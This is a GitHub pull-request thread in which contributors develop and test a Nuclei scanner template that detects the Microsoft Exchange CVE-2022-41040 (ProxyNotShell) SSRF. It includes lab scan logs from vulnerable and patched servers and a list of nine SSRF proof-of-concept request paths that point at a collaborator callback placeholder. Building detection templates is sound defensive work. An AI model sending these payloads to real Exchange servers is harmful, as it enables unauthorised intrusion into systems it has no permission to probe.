Added CVE-2022-41040

[PhillipoTF2]

Template / PR Information

I have created a template for CVE-2022-41040, which was added to CISA's KEV on 09/30/2022.
I have not properly validated this template however I have high confidence that this will work.

Any feedback is greatly appreciated :)

• Added CVE-2022-41040
• References:
• https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-41040
• http://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html
• https://hackerone.com/reports/1719719

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[PhillipoTF2]

Edited the matcher condition so it matches on both 404 status code and the presence of "protocol" in the body.

[S4lt5]

I think the string matcher needs to be more finely grained.

e.g.

404:
"Cannot GET /autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync"

is a positive match on a lot of servers that absolutely aren't anything to do with excahnge

[PhillipoTF2]

I think the string matcher needs to be more finely grained.

e.g.

404:
"Cannot GET /autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync"

is a positive match on a lot of servers that absolutely aren't anything to do with excahnge

I have updated the template to include the checks for Microsoft Exchange (Pinched from http/technologies/microsoft/ms-exchange-server.yaml). This should hopefully reduce said false positives. Any further feedback would be amazing :)

[PhillipoTF2]

Updated the template to check for "X-Feserver" in the response headers. Here are the results of my tests using a vulnerable exchange server (Running Exchange 2016 CU 16) and a patched server (Running Exchange 2016 CU 23 with security patch KB5019758)

#-------------------------------
# Vulnerable MS-EX 2016 (CU-16)
#-------------------------------

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.7.6 (latest)
[INF] New templates added in latest release: 49
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.189
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 302 Found
Connection: close
Content-Length: 714
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Mon, 04 Mar 2024 20:02:06 GMT
Expires: -1
Location: /owa/auth/errorfe.aspx?httpCode=500&msg=3529056431&msgParam=NT+AUTHORITY%5cSYSTEM&owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&owaVer=15.1.1713.5&be=WIN-834SULVBKJH&ts=133540561263308050&fe=WIN-834SULVBKJH&reqid=3c9badb0-7c24-4ad3-91bf-16f8cb784685&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=DagNotFound&forest=test.org&te=0&refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell
Pragma: no-cache
Request-Id: 3c9badb0-7c24-4ad3-91bf-16f8cb784685
Server: Microsoft-IIS/10.0
Set-Cookie: ClientId=1363C16AFD554DFDA479E5513A31FACD; expires=Tue, 04-Mar-2025 20:02:06 GMT; path=/; secure
Set-Cookie: X-BackEndCookie=; expires=Fri, 04-Mar-1994 20:02:06 GMT; path=/autodiscover; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Backend-Begin: 2024-03-04T12:02:06.272
X-Backend-End: 2024-03-04T12:02:06.340
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Content-Type-Options: nosniff
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Owa-Diagnosticsinfo: 67;5;0
X-Owa-Error: Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException,Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException
X-Owasupplevel: TenantAdmin
X-Powered-By: ASP.NET
X-Ua-Compatible: IE=EmulateIE7

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorfe.aspx?httpCode=500&amp;msg=3529056431&amp;msgParam=NT+AUTHORITY%5cSYSTEM&amp;owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&amp;owaVer=15.1.1713.5&amp;be=WIN-834SULVBKJH&amp;ts=133540561263308050&amp;fe=WIN-834SULVBKJH&amp;reqid=3c9badb0-7c24-4ad3-91bf-16f8cb784685&amp;creqid=&amp;cid=&amp;rt=Form15&amp;et=DefaultPage&amp;pal=0&amp;dag=DagNotFound&amp;forest=test.org&amp;te=0&amp;refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell">here</a>.</h2>
</body></html>
[CVE-2022-41040:status-1] [http] [high] https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell
[CVE-2022-41040:word-2] [http] [high] https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell


#-----------------------------------
 Patched MS-EX 2016 (CU 23 w/ patch)
#-----------------------------------

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.7.6 (latest)
[INF] New templates added in latest release: 49
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.77
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Tue, 05 Mar 2024 00:24:07 GMT
Request-Id: dec11fa8-7d29-402a-b14b-df37759efe3a
Server: Microsoft-IIS/10.0
Set-Cookie: X-BackEndCookie=; expires=Sat, 05-Mar-1994 00:24:07 GMT; path=/autodiscover; secure; HttpOnly
Vary: Accept-Encoding
X-Aspnet-Version: 4.0.30319
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Powered-By: ASP.NET

{"Protocol":"XYZ","Url":"https://win-834sulvbkjh.test.org/api"}
[INF] No results found. Better luck next time!

[PhillipoTF2]

Hi All,
I have updated this template as the previous matchers were insufficient.

#-------------------------------
# Vulnerable MS-EX 2016 (CU-16)
#-------------------------------

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Your current nuclei-templates v9.7.8 are outdated. Latest is v9.8.0
[INF] Successfully updated nuclei-templates (v9.8.0) to /Users/lukephillips/nuclei-templates. GoodLuck!
[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.8.0 (latest)
[INF] New templates added in latest release: 85
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.189
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 302 Found
Connection: close
Content-Length: 714
Cache-Control: no-cache, no-store
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Mar 2024 17:21:54 GMT
Expires: -1
Location: /owa/auth/errorfe.aspx?httpCode=500&msg=3529056431&msgParam=NT+AUTHORITY%5cSYSTEM&owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&owaVer=15.1.1713.5&be=WIN-834SULVBKJH&ts=133558609155988862&fe=WIN-834SULVBKJH&reqid=53657dd4-77fb-4224-988f-e2c325a30722&creqid=&cid=&rt=Form15&et=DefaultPage&pal=0&dag=DagNotFound&forest=test.org&te=0&refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell
Pragma: no-cache
Request-Id: 53657dd4-77fb-4224-988f-e2c325a30722
Server: Microsoft-IIS/10.0
Set-Cookie: ClientId=0C2987064A874D599B72B7D603B1E96F; expires=Tue, 25-Mar-2025 17:21:55 GMT; path=/; secure
Set-Cookie: X-BackEndCookie=; expires=Fri, 25-Mar-1994 17:21:55 GMT; path=/autodiscover; secure; HttpOnly
X-Aspnet-Version: 4.0.30319
X-Backend-Begin: 2024-03-25T10:21:55.141
X-Backend-End: 2024-03-25T10:21:55.631
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Content-Type-Options: nosniff
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Owa-Diagnosticsinfo: 464;15;0
X-Owa-Error: Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException,Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException
X-Owasupplevel: TenantAdmin
X-Powered-By: ASP.NET
X-Ua-Compatible: IE=EmulateIE7

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/owa/auth/errorfe.aspx?httpCode=500&amp;msg=3529056431&amp;msgParam=NT+AUTHORITY%5cSYSTEM&amp;owaError=Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException&amp;owaVer=15.1.1713.5&amp;be=WIN-834SULVBKJH&amp;ts=133558609155988862&amp;fe=WIN-834SULVBKJH&amp;reqid=53657dd4-77fb-4224-988f-e2c325a30722&amp;creqid=&amp;cid=&amp;rt=Form15&amp;et=DefaultPage&amp;pal=0&amp;dag=DagNotFound&amp;forest=test.org&amp;te=0&amp;refurl=https%3a%2f%2fwin-834sulvbkjh.test.org%3a444%2fowa%2f%3f%26Email%3dautodiscover%2fautodiscover.json%3fa%40foo.var%26Protocol%3dXYZ%26FooProtocol%3dPowershell">here</a>.</h2>
</body></html>
[CVE-2022-41040:word-1] [http] [high] https://192.168.1.189/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell
[0:00:01] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 1 | Errors: 0 | Requests: 1/1 (100%)




#-----------------------------------
 Patched MS-EX 2016 (CU 23 w/ patch)
#-----------------------------------
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.4

		projectdiscovery.io

[INF] Current nuclei version: v3.0.4 (outdated)
[INF] Current nuclei-templates version: v9.8.0 (latest)
[INF] New templates added in latest release: 85
[INF] Templates loaded for current scan: 1
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 0/1 (0%)
[INF] [CVE-2022-41040] Dumped HTTP request for https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

GET /autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1
Host: 192.168.1.77
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-41040] Dumped HTTP response https://192.168.1.77/autodiscover/autodiscover.json?a@foo.var/owa/?&Email=autodiscover/autodiscover.json?a@foo.var&Protocol=XYZ&FooProtocol=Powershell

HTTP/1.1 200 OK
Connection: close
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Mon, 25 Mar 2024 17:37:41 GMT
Request-Id: 886084ae-3787-424f-aafd-4548bb3021e7
Server: Microsoft-IIS/10.0
Set-Cookie: X-BackEndCookie=; expires=Fri, 25-Mar-1994 17:37:41 GMT; path=/autodiscover; secure; HttpOnly
Vary: Accept-Encoding
X-Aspnet-Version: 4.0.30319
X-Beserver: WIN-834SULVBKJH
X-Calculatedbetarget: win-834sulvbkjh.test.org
X-Diaginfo: WIN-834SULVBKJH
X-Feserver: WIN-834SULVBKJH
X-Powered-By: ASP.NET

{"Protocol":"XYZ","Url":"https://win-834sulvbkjh.test.org/api"}
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 1/1 (100%)
[INF] No results found. Better luck next time!

[princechaddha]

@PhillipoTF2, The response time to this PR was much longer than usual.

In this repository, we strive to include CVEs with complete PoCs, and the shared templates do not confirm SSRF. If you have a vulnerable environment set up, could you confirm whether the following PoCs are working?

Ref: https://github.com/kljunowsky/CVE-2022-41040-POC

/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell```

[PhillipoTF2]

@PhillipoTF2, The response time to this PR was much longer than usual.

In this repository, we strive to include CVEs with complete PoCs, and the shared templates do not confirm SSRF. If you have a vulnerable environment set up, could you confirm whether the following PoCs are working?

Ref: https://github.com/kljunowsky/CVE-2022-41040-POC

/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell```

Sorry for the delay on testing this.
I have updated this template to use the PoC as described above and tested this on a patched Exchange 2016 server (CU 23 w/ patch) and a vulnerable Exchange 2016 server (CU 12). The template works as expected for both of these cases (Positive result for the vulnerable server and no results for the patched server). I will be setting up a test environment for Exchange 2019 and Exchange 2013 later this week or early next week, so I will be testing the template on those too once those have been set up correctly.

[PhillipoTF2]

G'day All,
I have (finally) got around to testing this on Exchange 2019 as well. It works exactly as I would expect.
Is there any issues you can spot? From what I can tell this follows the PoC and correctly flags up the vulnerable versions of exchange 2016 and 2019.

-----------------------------------
MS Exchange 2019 CU 10 (Vulnerable)
-----------------------------------

[CVE-2022-41040:status-1] [http] [high] https://192.168.1.33/autodiscover/autodiscover.json?@192.168.1.33/&Email=autodiscover/autodiscover.json%3f@192.168.1.33
[CVE-2022-41040:word-2] [http] [high] https://192.168.1.33/autodiscover/autodiscover.json?@192.168.1.33/&Email=autodiscover/autodiscover.json%3f@192.168.1.33
[0:00:07] | Templates: 1 | Hosts: 1 | RPS: 1 | Matched: 2 | Errors: 0 | Requests: 10/10 (100%)


---------------------------------
MS Exchange 2019 CU 14 (Patched)
---------------------------------

[0:00:10] | Templates: 1 | Hosts: 1 | RPS: 1 | Matched: 0 | Errors: 0 | Requests: 10/10 (100%)
[INF] No results found. Better luck next time!


-----------------------------------
MS Exchange 2016 CU 23 (Vulnerable)
-----------------------------------

[CVE-2022-41040:status-1] [http] [high] https://192.168.1.28/autodiscover/autodiscover.json?@192.168.1.28/&Email=autodiscover/autodiscover.json%3f@192.168.1.28
[CVE-2022-41040:word-2] [http] [high] https://192.168.1.28/autodiscover/autodiscover.json?@192.168.1.28/&Email=autodiscover/autodiscover.json%3f@192.168.1.28
[0:00:18] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 2 | Errors: 1 | Requests: 10/10 (100%)

--------------------------------
MS Exchange 2016 CU 23 (Patched)
--------------------------------

[0:00:13] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 10/10 (100%)
[INF] No results found. Better luck next time!

[rxerium]

I've been following this PR for a while, when you have some time @princechaddha would you be able to review this so we can look to merge? Thanks!

[princechaddha]

This PR is on hold because the following matchers look weak and can produce false positives. Additionally, they do not confirm any callback, so SSRF is not validated. @PhillipoTF2, can you share a template that confirms SSRF and works on the vulnerable version only?

Also it would be helpful in validating if you share share debug data for both the hosts. cc @rxerium

    matchers:
      - type: status
        status:
          - 404
      - type: word
        part: body
        words: 
          - 'IIS Web Core'
    matchers-condition: and